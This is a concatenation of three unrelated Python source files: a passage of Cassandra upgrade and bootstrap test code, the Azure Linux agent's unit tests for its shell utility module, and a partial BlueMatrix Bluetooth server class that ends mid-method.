self._wait_until_queue_condition('counters incremented (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
count_verifier = Process(target=counter_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
count_verifier.daemon = True
self.subprocs.append(count_verifier)
count_verifier.start()
return incrementer, count_verifier, to_verify_queue
def _increment_counters(self, opcount=25000):
debug("performing {opcount} counter increments".format(opcount=opcount))
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
update_counter_query = ("UPDATE countertable SET c = c + 1 WHERE k1='{key1}' and k2={key2}")
self.expected_counts = {}
for i in range(10):
self.expected_counts[uuid.uuid4()] = defaultdict(int)
fail_count = 0
for i in range(opcount):
key1 = random.choice(self.expected_counts.keys())
key2 = random.randint(1, 10)
try:
query = SimpleStatement(update_counter_query.format(key1=key1, key2=key2), consistency_level=ConsistencyLevel.ALL)
session.execute(query)
except WriteTimeout:
fail_count += 1
else:
self.expected_counts[key1][key2] += 1
if fail_count > 100:
break
self.assertLess(fail_count, 100, "Too many counter increment failures")
def _check_counters(self):
debug("Checking counter values...")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
for key1 in self.expected_counts.keys():
for key2 in self.expected_counts[key1].keys():
expected_value = self.expected_counts[key1][key2]
query = SimpleStatement("SELECT c from countertable where k1='{key1}' and k2={key2};".format(key1=key1, key2=key2),
consistency_level=ConsistencyLevel.ONE)
results = session.execute(query)
if results is not None:
actual_value = results[0][0]
else:
# counter wasn't found
actual_value = None
self.assertEqual(actual_value, expected_value)
def _check_select_count(self, consistency_level=ConsistencyLevel.ALL):
debug("Checking SELECT COUNT(*)")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
expected_num_rows = len(self.row_values)
countquery = SimpleStatement("SELECT COUNT(*) FROM cf;", consistency_level=consistency_level)
result = session.execute(countquery)
if result is not None:
actual_num_rows = result[0][0]
self.assertEqual(actual_num_rows, expected_num_rows, "SELECT COUNT(*) returned %s when expecting %s" % (actual_num_rows, expected_num_rows))
else:
self.fail("Count query did not return")
class BootstrapMixin(object):
"""
Can be mixed into UpgradeTester or a subclass thereof to add bootstrap tests.
Using this class is not currently feasible on lengthy upgrade paths, as each
version bump adds a node and this will eventually exhaust resources.
"""
def _bootstrap_new_node(self):
# Check we can bootstrap a new node on the upgraded cluster:
debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)))
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def _bootstrap_new_node_multidc(self):
# Check we can bootstrap a new node on the upgraded cluster:
debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)), data_center='dc2')
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def bootstrap_test(self):
# try and add a new node
self.upgrade_scenario(after_upgrade_call=(self._bootstrap_new_node,))
def bootstrap_multidc_test(self):
# try and add a new node
# multi dc, 2 nodes in each dc
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
cluster.populate([2, 2])
[node.start(use_jna=True, wait_for_binary_proto=True) for node in self.cluster.nodelist()]
self._multidc_schema_create()
self.upgrade_scenario(populate=False, create_schema=False, after_upgrade_call=(self._bootstrap_new_node_multidc,))
def _multidc_schema_create(self):
session = self.patient_cql_connection(self.cluster.nodelist()[0], protocol_version=self.protocol_version)
if self.cluster.version() >= '1.2':
# DDL for C* 1.2+
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'NetworkTopologyStrategy', 'dc1':1, 'dc2':2};")
else:
# DDL for C* 1.1
session.execute("""CREATE KEYSPACE upgrade WITH strategy_class = 'NetworkTopologyStrategy'
AND strategy_options:'dc1':1
AND strategy_options:'dc2':2;
""")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY , v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def create_upgrade_class(clsname, version_metas, protocol_version,
bootstrap_test=False, extra_config=None):
"""
Dynamically creates a test subclass for testing the given versions.
'clsname' is the name of the new class.
'protocol_version' is an int.
'bootstrap_test' is a boolean, if True bootstrap testing will be included. Default False.
'version_metas' is a list of version metas (versions ccm will recognize), to be upgraded in order.
'extra_config' is a tuple of config options that can (eventually) be cast as a dict,
e.g. (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
"""
if extra_config is None:
extra_config = (('partitioner', 'org.apache.cassandra.dht.Murmur3Partitioner'),)
if bootstrap_test:
parent_classes = (UpgradeTester, BootstrapMixin)
else:
parent_classes = (UpgradeTester,)
# short names for debug output
parent_class_names = [cls.__name__ for cls in parent_classes]
print_("Creating test class {} ".format(clsname))
print_(" for C* versions:\n{} ".format(pprint.pformat(version_metas)))
print_(" using protocol: v{}, and parent classes: {}".format(protocol_version, parent_class_names))
print_(" to run these tests alone, use `nosetests {}.py:{}`".format(__name__, clsname))
upgrade_applies_to_env = RUN_STATIC_UPGRADE_MATRIX or version_metas[-1].matches_current_env_version_family
newcls = skipUnless(upgrade_applies_to_env, 'test not applicable to env.')(
type(
clsname,
parent_classes,
{'test_version_metas': version_metas, '__test__': True, 'protocol_version': protocol_version, 'extra_config': extra_config}
))
if clsname in globals():
raise RuntimeError("Class by name already exists!")
globals()[clsname] = newcls
return newcls
MultiUpgrade = namedtuple('MultiUpgrade', ('name', 'version_metas', 'protocol_version', 'extra_config'))
MULTI_UPGRADES = (
# Proto v1 upgrades (v1 supported on 2.0, 2.1, 2.2)
MultiUpgrade(name='ProtoV1Upgrade_AllVersions_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=1, extra_config=None),
MultiUpgrade(name='ProtoV1Upgrade_AllVersions_RandomPartitioner_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=1,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v2 upgrades (v2 is supported on 2.0, 2.1, 2.2)
MultiUpgrade(name='ProtoV2Upgrade_AllVersions_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=2, extra_config=None),
MultiUpgrade(name='ProtoV2Upgrade_AllVersions_RandomPartitioner_EndsAt_indev_2_2_x',
version_metas=[current_2_0_x, current_2_1_x, indev_2_2_x], protocol_version=2,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v3 upgrades (v3 is supported on 2.1, 2.2, 3.0, 3.1, trunk)
MultiUpgrade(name='ProtoV3Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_x], protocol_version=3, extra_config=None),
MultiUpgrade(name='ProtoV3Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_1_x, current_2_2_x, current_3_0_x, indev_3_x], protocol_version=3,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
# Proto v4 upgrades (v4 is supported on 2.2, 3.0, 3.1, trunk)
MultiUpgrade(name='ProtoV4Upgrade_AllVersions_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, indev_3_x], protocol_version=4, extra_config=None),
MultiUpgrade(name='ProtoV4Upgrade_AllVersions_RandomPartitioner_EndsAt_Trunk_HEAD',
version_metas=[current_2_2_x, current_3_0_x, indev_3_x], protocol_version=4,
extra_config=(
('partitioner', 'org.apache.cassandra.dht.RandomPartitioner'),
)),
)
for upgrade in MULTI_UPGRADES:
# if any version_metas are None, this means they are versions not to be tested currently
if all(upgrade.version_metas):
metas = upgrade.version_metas
if not RUN_STATIC_UPGRADE_MATRIX:
if metas[-1].matches_current_env_version_family:
# looks like this test should actually run in the current env, so let's set the final version to match the env exactly
oldmeta = metas[-1]
newmeta = oldmeta.clone_with_local_env_version()
debug("{} appears applicable to current env. Overriding final test version from {} to {}".format(upgrade.name, oldmeta.version, newmeta.version))
metas[-1] = newmeta
create_upgrade_class(upgrade.name, [m for m in metas], protocol_version=upgrade.protocol_version, extra_config=upgrade.extra_config)
for pair in build_upgrade_pairs():
create_upgrade_class(
'Test' + pair.name,
[pair.starting_meta, pair.upgrade_meta],
protocol_version=pair.starting_meta.max_proto_v,
bootstrap_test=True
)
|
test_shell_util.py | # -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import os
import signal
import tempfile
import threading
import time
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, kwargs = mock_logger.error.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.info.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, kwargs = mock_logger.info.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
self.assertEqual(mock_logger.error.call_count, 0)
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, kwargs = mock_logger.error.call_args # pylint: disable=unused-variable
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0)
self.assertEqual(mock_logger.verbose.call_count, 0)
self.assertEqual(mock_logger.warn.call_count, 0)
# R0904: Too many public methods (24/20) -- disabled: each method is a unit test
class RunCommandTestCase(AgentTestCase): # pylint: disable=R0904
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
#
# The test pipe splits the output of "ls" in lines and then greps for "."
#
# Sample output of "ls -d .":
# drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
#
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
def test_run_command_should_raise_an_exception_when_it_cannot_execute_the_command(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_command("nonexistent_command"))
def test_run_pipe_should_raise_an_exception_when_it_cannot_execute_the_pipe(self):
self.__it_should_raise_an_exception_when_it_cannot_execute_the_command(
lambda: shellutil.run_pipe([["ls", "-ld", "."], ["nonexistent_command"], ["wc", "-l"]]))
def __it_should_not_log_by_default(self, action):
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
try:
action()
except Exception:
pass
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any WARNINGS; Got: {0}".format(mock_logger.warn.call_args))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any ERRORS; Got: {0}".format(mock_logger.error.call_args))
def test_run_command_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_command(["ls", "nonexistent_file"])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_command("nonexistent_command")) # Raises an OSError
def test_run_pipe_it_should_not_log_by_default(self):
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], [self.__create_tee_script(return_code=1)]])) # Raises a CommandError
self.__it_should_not_log_by_default(
lambda: shellutil.run_pipe([["date"], ["nonexistent_command"]])) # Raises an OSError
def __it_should_log_an_error_when_log_error_is_set(self, action, command):
with patch("azurelinuxagent.common.utils.shellutil.logger.error") as mock_log_error:
try:
action()
except Exception:
pass
self.assertEqual(mock_log_error.call_count, 1)
args, _ = mock_log_error.call_args
self.assertTrue(any(command in str(a) for a in args), "The command was not logged")
self.assertTrue(any("2" in str(a) for a in args), "The command's return code was not logged") # errno 2: No such file or directory
def test_run_command_should_log_an_error_when_log_error_is_set(self):
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command(["ls", "file-does-not-exist"], log_error=True), # Raises a CommandError
command="ls")
self.__it_should_log_an_error_when_log_error_is_set(
lambda: shellutil.run_command("command-does-not-exist", log_error=True), # Raises a CommandError
command="command-does-not-exist")
def test_run_command_should_raise_when_both_the_input_and_stdin_parameters_are_specified(self):
with tempfile.TemporaryFile() as input_file:
with self.assertRaises(ValueError):
shellutil.run_command(["cat"], input='0123456789ABCDEF', stdin=input_file)
def test_run_command_should_read_the_command_input_from_the_input_parameter_when_it_is_a_string(self):
command_input = 'TEST STRING'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_stdin_from_the_input_parameter_when_it_is_a_sequence_of_bytes(self):
command_input = 'TEST BYTES'
output = shellutil.run_command(["cat"], input=command_input)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def __it_should_read_the_command_input_from_the_stdin_parameter(self, action):
command_input = 'TEST STRING\n'
with tempfile.TemporaryFile() as input_file:
input_file.write(command_input.encode())
input_file.seek(0)
output = action(stdin=input_file)
self.assertEqual(output, command_input, "The command did not process its input correctly; the output should match the input")
def test_run_command_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_command(["cat"], stdin=stdin))
def test_run_pipe_should_read_the_command_input_from_the_stdin_parameter(self):
self.__it_should_read_the_command_input_from_the_stdin_parameter(
lambda stdin: shellutil.run_pipe([["cat"], ["sort"]], stdin=stdin))
def __it_should_write_the_command_output_to_the_stdout_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
captured_output = action(stdout=output_file)
output_file.seek(0)
command_output = ustr(output_file.read(), encoding='utf-8', errors='backslashreplace')
self.assertEqual(command_output, "TEST STRING\n", "The command did not produce the correct output; the output should match the input")
self.assertEqual("", captured_output, "No output should have been captured since it was redirected to a file. Output: [{0}]".format(captured_output))
def test_run_command_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_command(["echo", "TEST STRING"], stdout=stdout))
def test_run_pipe_should_write_the_command_output_to_the_stdout_parameter(self):
self.__it_should_write_the_command_output_to_the_stdout_parameter(
lambda stdout: shellutil.run_pipe([["echo", "TEST STRING"], ["sort"]], stdout=stdout))
def __it_should_write_the_command_error_output_to_the_stderr_parameter(self, action):
with tempfile.TemporaryFile() as output_file:
action(stderr=output_file)
output_file.seek(0)
command_error_output = ustr(output_file.read(), encoding='utf-8', errors="backslashreplace")
self.assertEqual("TEST STRING\n", command_error_output, "stderr was not redirected to the output file correctly")
def test_run_command_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_command(self.__create_tee_script(), input="TEST STRING\n", stderr=stderr))
def test_run_pipe_should_write_the_command_error_output_to_the_stderr_parameter(self):
self.__it_should_write_the_command_error_output_to_the_stderr_parameter(
lambda stderr: shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], stderr=stderr))
def test_run_pipe_should_capture_the_stderr_of_all_the_commands_in_the_pipe(self):
with self.assertRaises(shellutil.CommandError) as context_manager:
shellutil.run_pipe([
["echo", "TEST STRING"],
[self.__create_tee_script()],
[self.__create_tee_script()],
[self.__create_tee_script(return_code=1)]])
self.assertEqual("TEST STRING\n" * 3, context_manager.exception.stderr, "Expected 3 copies of the test string since there are 3 commands in the pipe")
def test_run_command_should_return_a_string_by_default(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING")
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_string_by_default(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]])
self.assertTrue(isinstance(output, ustr), "The return value should be a string. Got: '{0}'".format(type(output)))
def test_run_command_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_command(self.__create_tee_script(), input="TEST STRING", encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
def test_run_pipe_should_return_a_bytes_object_when_encode_output_is_false(self):
output = shellutil.run_pipe([["echo", "TEST STRING"], [self.__create_tee_script()]], encode_output=False)
self.assertTrue(isinstance(output, bytes), "The return value should be a bytes object. Got: '{0}'".format(type(output)))
# R0912: Too many branches (13/12) (too-many-branches) -- Disabled: Branches are sequential
def test_run_command_run_pipe_run_get_output_should_keep_track_of_the_running_commands(self): # pylint:disable=R0912
# The children processes run this script, which creates a file with the PIDs of the script and its parent and then sleeps for a long time
child_script = os.path.join(self.tmp_dir, "write_pids.py")
AgentTestCase.create_script(child_script, """
import os
import sys
import time
with open(sys.argv[1], "w") as pid_file:
pid_file.write("{0} {1}".format(os.getpid(), os.getppid()))
time.sleep(120)
""")
threads = []
try:
child_processes = []
parent_processes = []
try:
# each of these files will contain the PIDs of the command that created it and its parent
pid_files = [os.path.join(self.tmp_dir, "pids.txt.{0}".format(i)) for i in range(4)]
# we test these functions in shellutil
commands_to_execute = [
# run_get_output must be the first in this list; see the code to fetch the PIDs a few lines below
lambda: shellutil.run_get_output("{0} {1}".format(child_script, pid_files[0])),
lambda: shellutil.run_command([child_script, pid_files[1]]),
lambda: shellutil.run_pipe([[child_script, pid_files[2]], [child_script, pid_files[3]]]),
]
# start each command on a separate thread (since we need to examine the processes running the commands while they are running)
def invoke(command):
try:
command()
except shellutil.CommandError as command_error:
if command_error.returncode != -9: # test cleanup terminates the commands, so this is expected
raise
for cmd in commands_to_execute:
thread = threading.Thread(target=invoke, args=(cmd,))
thread.start()
threads.append(thread)
# now fetch the PIDs in the files created by the commands, but wait until they are created
if not self._wait_for(lambda: all(os.path.exists(file) and os.path.getsize(file) > 0 for file in pid_files)):
raise Exception("The child processes did not start within the allowed timeout")
for sig_file in pid_files:
with open(sig_file, "r") as read_handle:
pids = read_handle.read().split()
child_processes.append(int(pids[0]))
parent_processes.append(int(pids[1]))
# the first item to in the PIDs we fetched corresponds to run_get_output, which invokes the command using the
# shell, so in that case we need to use the parent's pid (i.e. the shell that we started)
started_commands = parent_processes[0:1] + child_processes[1:]
# wait for all the commands to start
running_commands = [[]]
def all_commands_running():
running_commands[0] = shellutil.get_running_commands()
return len(running_commands[0]) >= len(commands_to_execute) + 1 # +1 because run_pipe starts 2 commands
if not self._wait_for(all_commands_running):
self.fail("shellutil.get_running_commands() did not report the expected number of commands after the allowed timeout.\nExpected: {0}\nGot: {1}".format(
self._format_pids(started_commands), self._format_pids(running_commands[0])))
started_commands.sort()
running_commands[0].sort()
self.assertEqual(
started_commands,
running_commands[0],
"shellutil.get_running_commands() did not return the expected commands.\nExpected: {0}\nGot: {1}".format(
self._format_pids(started_commands), self._format_pids(running_commands[0])))
finally:
# terminate the child processes, since they are blocked
for pid in child_processes:
os.kill(pid, signal.SIGKILL)
# once the processes complete, their PIDs should go away
running_commands = [[]]
def all_commands_completed():
running_commands[0] = shellutil.get_running_commands()
return len(running_commands[0]) == 0
if not self._wait_for(all_commands_completed):
self.fail("shellutil.get_running_commands() should return empty after the commands complete. Got: {0}".format(
self._format_pids(running_commands[0])))
finally:
for thread in threads:
thread.join(timeout=5)
@staticmethod
def _format_pids(pids):
return ustr([RunCommandTestCase._get_command_line(pid) for pid in pids])
@staticmethod
def _get_command_line(pid):
try:
cmdline = '/proc/{0}/cmdline'.format(pid)
if os.path.exists(cmdline):
with open(cmdline, "r") as cmdline_file:
return "[PID: {0}] {1}".format(pid, cmdline_file.read())
except Exception:
pass
return "[PID: {0}] UNKNOWN".format(pid)
@staticmethod
def _wait_for(predicate):
start_time = datetime.datetime.now()
while RunCommandTestCase._to_seconds(datetime.datetime.now() - start_time) < 10:
if predicate():
return True
time.sleep(0.01)
return False
@staticmethod
def _to_seconds(time_delta):
return (time_delta.microseconds + (time_delta.seconds + time_delta.days * 24 * 3600) * 10**6) / 10**6
if __name__ == '__main__':
unittest.main()
|
matrix.py | from colours import BLUE, RED, GREEN, WHITE, BLACK, YELLOW, Colour
from btcomm import BluetoothServer
from threading import Event
from threads import WrapThread
import json
from time import sleep
class BlueMatrix(object):
"""
"""
def __init__(self,
cols = 5,
rows = 3,
border = True,
visible = True,
colour = BLUE,
bt_device = "hci0",
bt_port = 2,
auto_start_server = True,
print_messages = True):
self._cols = 0
self._rows = 0
self._border = border
self._visible = visible
self._colour = colour
self._cells = {}
self._update_cells(cols, rows)
self._bt_device = bt_device
self._bt_port = bt_port
self._data_buffer = ""
self._print_messages = print_messages
self._is_connected_event = Event()
self._when_client_connects = None
self._when_client_disconnects = None
self._create_server()
if auto_start_server:
self.start()
# PROPERTIES
@property
def cells(self):
return [ c for c in self._cells.values() ]
@property
def cols(self):
return self._cols
@cols.setter
def cols(self, value):
self._update_cells(value, self._rows)
@property
def rows(self):
return self._rows
@rows.setter
def rows(self, value):
self._update_cells(self._cols, value)
@property
def colour(self):
return self._colour
@colour.setter
def colour(self, value):
if self._colour != value:
self._colour = value
# update all the cells
for cell in self.cells:
cell.colour = value
@property
def border(self):
return self._border
@border.setter
def border(self, value):
self._border = value
for cell in self.cells:
cell.border = value
@property
def visible(self):
return self._visible
@visible.setter
def visible(self, value):
self._visible = value
for cell in self.cells:
cell.visible = value
@property
def server(self):
"""
The :class:`.btcomm.BluetoothServer` instance that is being used to communicate
with clients.
"""
return self._server
@property
def running(self):
"""
Returns ``True`` if the server is running.
"""
return self._server.running
@property
def print_messages(self):
"""
When set to ``True``, messages relating to the status of the Bluetooth server
are printed.
"""
return self._print_messages
@print_messages.setter
def print_messages(self, value):
self._print_messages = value
@property
def when_client_connects(self):
"""
Sets or returns the function which is called when a client connects.
"""
return self._when_client_connects
@when_client_connects.setter
def when_client_connects(self, value):
self._when_client_connects = value
@property
def when_client_disconnects(self):
"""
Sets or returns the function which is called when a client disconnects.
"""
return self._when_client_disconnects
@when_client_disconnects.setter
def when_client_disconnects(self, value):
self._when_client_disconnects = value
# METHODS
def start(self):
"""
Start the :class:`.btcomm.BluetoothServer` if it is not already running. By default the server is started at
initialisation.
"""
self._server.start()
self._print_message("Server started {}".format(self.server.server_address))
self._print_message("Waiting for connection")
def stop(self):
"""
Stop the Bluetooth server.
"""
self._server.stop()
def cell(self, col, row):
try:
return self._cells[(col, row)]
except KeyError as e:
raise KeyError("Cell ({},{}) does not exist".format(col, row))
# INTERNAL METHODS
def _update_cells(self, cols, rows):
# create new cells
new_cells = {}
for c in range(cols):
for r in range(rows):
# if cell already exist, reuse it
if (c,r) in self._cells.keys():
new_cells[c,r] = self._cells[(c,r)]
else:
new_cells[c,r] = BlueMatrixCell(self, c, r, self._border, self._visible, self._colour)
self._cols = cols
self._rows = rows
self._cells = new_cells
def _create_server(self):
self._server = BluetoothServer(
self._data_received,
when_client_connects = self._client_connected,
when_client_disconnects = self._client_disconnected,
device = self._bt_device,
uuid = "5c464d54-bb29-4f1e-bcf8-caa0860fb48e",
port = self._bt_port,
power_up_device = True,
auto_start = False)
def _client_connected(self):
# send setup data to the client
self.set_matrix_and_cells()
self._is_connected_event.set()
self._print_message("Client connected {}".format(self.server.client_address))
if self.when_client_connects:
call_back_t = WrapThread(target=self.when_client_connects)
call_back_t.start()
def _client_disconnected(self):
self._is_connected_event.clear()
self._print_message("Client disconnected")
if self.when_client_disconnects:
call_back_t = WrapThread(target=self.when_client_disconnects)
call_back_t.start()
def _data_received(self, data):
#add the data received to the buffer
self._data_buffer += data
#get any full commands ended by \n
last_command = self._data_buffer.rfind("\n")
if last_command != -1:
commands = self._data_buffer[:last_command].split("\n")
#remove the processed commands from the buffer
self._data_buffer = self._data_buffer[last_command + 1:]
print("in = {}".format(commands))
#self._process_commands(commands)
def _print_message(self, message):
if self.print_messages:
print(message)
def set_matrix_and_cells(self):
"""
Sends the whole matrix configuration to the client.
Called when a new client connects.
"""
self.set_matrix()
for cell in self.cells:
if cell.modified:
self.set_cell(cell)
def set_matrix(self):
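# Wire format (inferred from the format strings below; it is not documented elsewhere):
# "1,<cols>,<rows>,<argb colour>,<border 0|1>,<visible 0|1>\n" describes the whole matrix,
# and set_cell() sends "2,<col>,<row>,<argb colour>,<border 0|1>,<visible 0|1>\n" per cell.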
cmd = "1,{},{},{},{},{}\n"
cmd = cmd.format(
self.cols,
self.rows,
self.colour.str_argb,
"1" if self.border else "0",
"1" if self.visible else "0",
)
print(cmd)
